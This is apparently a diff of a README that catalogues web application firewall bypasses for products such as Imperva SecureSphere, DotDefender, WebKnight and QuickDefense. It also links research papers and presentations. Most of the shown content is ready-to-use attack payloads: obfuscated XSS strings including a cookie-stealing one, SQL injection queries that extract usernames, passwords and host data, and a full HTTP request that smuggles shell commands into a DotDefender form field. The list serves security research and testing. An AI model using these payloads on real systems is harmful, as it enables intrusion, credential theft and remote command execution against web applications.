|
||||||
```
|
|
||||||
- XSS Bypass by [@WAFNinja](https://waf.ninja)
|
|
||||||
```
|
|
||||||
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
|
|
||||||
```
|
|
||||||
- XSS Bypass by [@i_bo0om](https://twitter.com/i_bo0om)
|
|
||||||
```
|
|
||||||
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
|
|
||||||
<img/src=q onerror='new Function`al\ert\`1\``'>
|
|
||||||
```
|
|
||||||
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
|
|
||||||
```
|
|
||||||
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
|
||||||
```
|
|
||||||
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
|
|
||||||
```
|
|
||||||
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
|
|
||||||
```
|
|
||||||
- SQLi by [@Giuseppe D'Amore](https://www.exploit-db.com/?author=6413)
|
|
||||||
```
|
|
||||||
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
|
|
||||||
```
|
|
||||||
- [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991)
|
|
||||||
|
|
||||||
### __DotDefender__
|
### __DotDefender__
|
||||||
- Firewall disable by (v5.0) by [@hyp3rlinx](http://hyp3rlinx.altervista.org)
|
- Firewall disable by (v5.0) by [@hyp3rlinx](http://hyp3rlinx.altervista.org)
|
||||||
```
|
```
|
||||||
@ -1765,8 +1802,7 @@ PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
|
|||||||
```
|
```
|
||||||
POST /dotDefender/index.cgi HTTP/1.1
|
POST /dotDefender/index.cgi HTTP/1.1
|
||||||
Host: 172.16.159.132
|
Host: 172.16.159.132
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
|
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
|
||||||
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
|
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
Accept-Language: en-us,en;q=0.5
|
Accept-Language: en-us,en;q=0.5
|
||||||
Accept-Encoding: gzip,deflate
|
Accept-Encoding: gzip,deflate
|
||||||
@ -1778,8 +1814,7 @@ Cache-Control: max-age=0
|
|||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Length: 95
|
Content-Length: 95
|
||||||
|
|
||||||
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al
|
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
|
||||||
../;pwd;&action=deletesite&linenum=15
|
|
||||||
```
|
```
|
||||||
- Persistent XSS (v4.0) by [@EnableSecurity](https://enablesecurity.com)
|
- Persistent XSS (v4.0) by [@EnableSecurity](https://enablesecurity.com)
|
||||||
```
|
```
|
||||||
@ -1896,40 +1931,60 @@ state=%2527+and+
|
|||||||
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
|
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
|
||||||
```
|
```
|
||||||
|
|
||||||
### __Citrix NetScaler NS10.5__
|
### __Imperva SecureSphere__
|
||||||
- HTTP Parameter Pollution [@BGA Security](https://www.exploit-db.com/?author=7396)
|
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
|
||||||
|
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
|
||||||
```
|
```
|
||||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
|
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||||
<soapenv:Header/>
|
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||||
<soapenv:Body>
|
|
||||||
<string>’ union select current_user, 2#</string>
|
|
||||||
</soapenv:Body>
|
|
||||||
</soapenv:Envelope>
|
|
||||||
```
|
```
|
||||||
|
- XSS Bypass by [@WAFNinja](https://waf.ninja)
|
||||||
- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654)
|
|
||||||
```
|
```
|
||||||
/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
|
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
|
||||||
```
|
```
|
||||||
|
- XSS Bypass by [@i_bo0om](https://twitter.com/i_bo0om)
|
||||||
|
```
|
||||||
|
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
|
||||||
|
<img/src=q onerror='new Function`al\ert\`1\``'>
|
||||||
|
```
|
||||||
|
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
|
||||||
|
```
|
||||||
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
|
```
|
||||||
|
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
|
||||||
|
```
|
||||||
|
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
|
||||||
|
```
|
||||||
|
- SQLi by [@Giuseppe D'Amore](https://www.exploit-db.com/?author=6413)
|
||||||
|
```
|
||||||
|
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
|
||||||
|
```
|
||||||
|
- [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991)
|
||||||
|
|
||||||
### __WebKnight__
|
### __WebKnight__
|
||||||
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/review-wafninja/)
|
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
|
||||||
```
|
```
|
||||||
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
|
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
|
||||||
<marquee/onstart=confirm(2)>
|
<marquee/onstart=confirm(2)>
|
||||||
<details ontoggle=alert(1)>
|
<details ontoggle=alert(1)>
|
||||||
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
|
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
|
||||||
|
<img src=x onwheel=prompt(1)>
|
||||||
|
```
|
||||||
|
- SQLi by [@WAFNinja](https://waf.ninja)
|
||||||
|
```
|
||||||
|
0 union(select 1,username,password from(users))
|
||||||
|
0 union(select 1,@@hostname,@@datadir)
|
||||||
```
|
```
|
||||||
|
|
||||||
### __QuickDefense__
|
### __QuickDefense__
|
||||||
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/review-wafninja/)
|
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
|
||||||
```
|
```
|
||||||
?<input type="search" onsearch="aler\u0074(1)">
|
?<input type="search" onsearch="aler\u0074(1)">
|
||||||
<details ontoggle=alert(1)>
|
<details ontoggle=alert(1)>
|
||||||
```
|
```
|
||||||
|
|
||||||
### __Apache__
|
### __Apache__
|
||||||
- Writing method type in lowercase. [Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_
|
- Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)
|
||||||
```
|
```
|
||||||
get /login HTTP/1.1
|
get /login HTTP/1.1
|
||||||
Host: favoritewaf.com
|
Host: favoritewaf.com
|
||||||
@ -1937,7 +1992,7 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
|
|||||||
```
|
```
|
||||||
|
|
||||||
### __IIS__
|
### __IIS__
|
||||||
- Tabs before method _([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_
|
- Tabs before method by [@i_bo0om](http://twitter.com/i_bo0om)
|
||||||
```
|
```
|
||||||
GET /login.php HTTP/1.1
|
GET /login.php HTTP/1.1
|
||||||
Host: favoritewaf.com
|
Host: favoritewaf.com
|
||||||
@ -2032,6 +2087,10 @@ X-Remote-Addr: 127.0.0.1
|
|||||||
- [How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing](https://www.sunnyhoi.com/reverse-engineer-web-application-firewall-using-regular-expression-reversing/) - By [@SunnyHoi](https://sunnyhoi.com).
|
- [How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing](https://www.sunnyhoi.com/reverse-engineer-web-application-firewall-using-regular-expression-reversing/) - By [@SunnyHoi](https://sunnyhoi.com).
|
||||||
- [Bypassing Web-Application Firewalls by abusing SSL/TLS](https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) - By [@0x09AL](https://github.com/0x09al).
|
- [Bypassing Web-Application Firewalls by abusing SSL/TLS](https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) - By [@0x09AL](https://github.com/0x09al).
|
||||||
|
|
||||||
|
## Video Presentations
|
||||||
|
- [WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior](https://www.youtube.com/watch?v=tSf_IXfuzXk) from [@OWASP](https://owasp.org).
|
||||||
|
- [Fingerprinting Filter Rules of Web Application Firewalls](https://www.usenix.org/conference/woot12/workshop-program/presentation/schmitt) from [@UseNix](https://www.usenix.com).
|
||||||
|
|
||||||
## Presentations & Research Papers
|
## Presentations & Research Papers
|
||||||
### Research Papers:
|
### Research Papers:
|
||||||
- [Protocol Level WAF Evasion](papers/Qualys%20Guide%20-%20Protocol-Level%20WAF%20Evasion.pdf) - A protocol level WAF evasion techniques and analysis by [Qualys](https://www.qualys.com).
|
- [Protocol Level WAF Evasion](papers/Qualys%20Guide%20-%20Protocol-Level%20WAF%20Evasion.pdf) - A protocol level WAF evasion techniques and analysis by [Qualys](https://www.qualys.com).
|
||||||
@ -2046,11 +2105,14 @@ X-Remote-Addr: 127.0.0.1
|
|||||||
- [Beyond SQLi - Obfuscate and Bypass WAFs](papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt) - A research paper from [Exploit Database](https://exploit-db.com) about obfuscating SQL injection queries to effectively bypass WAFs.
|
- [Beyond SQLi - Obfuscate and Bypass WAFs](papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt) - A research paper from [Exploit Database](https://exploit-db.com) about obfuscating SQL injection queries to effectively bypass WAFs.
|
||||||
|
|
||||||
### Presentations:
|
### Presentations:
|
||||||
|
- [Methods to Bypass a Web Application Firewall](presentrations/Methods%20To%20Bypass%20A%20Web%20Application%20Firewall.pdf) - A presentation from [PT Security](https://www.ptsecurity.com) about bypassing WAF filters and evasion.
|
||||||
|
- [Web Application Firewall Bypassing (How to Defeat the Blue Team)](presentation/Web%20Application%20Firewall%20Bypassing%20(How%20to%20Defeat%20the%20Blue%20Team).pdf) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by [@OWASP](https://owasp.org).
|
||||||
- [WAF Profiling & Evasion Techniques](presentations/OWASP%20WAF%20Profiling%20&%20Evasion.pdf) - A WAF testing and evasion guide from [OWASP](https://www.owasp.org).
|
- [WAF Profiling & Evasion Techniques](presentations/OWASP%20WAF%20Profiling%20&%20Evasion.pdf) - A WAF testing and evasion guide from [OWASP](https://www.owasp.org).
|
||||||
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
|
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
|
||||||
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
|
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
|
||||||
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
|
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
|
||||||
|
- [Our Favorite XSS Filters/IDS and how to Attack Them](presentations/Our%20Favourite%20XSS%20WAF%20Filters%20And%20How%20To%20Bypass%20Them.pdf) - A presentation about how to evade XSS filters set by WAF rules from [BlackHat USA 09](https://www.blackhat.com/html/bh-us-09/)
|
||||||
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
|
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
|
||||||
<!--stackedit_data:
|
|
||||||
eyJoaXN0b3J5IjpbMTgwNDI2NTY1OF19
|
## Credits & License:
|
||||||
-->
|
This work has been presented by [Infected Drake](https://twitter.com/0xInfection) and is licensed under the [Apache 2.0 License](LICENSE).
|
Loading…
Reference in New Issue
Block a user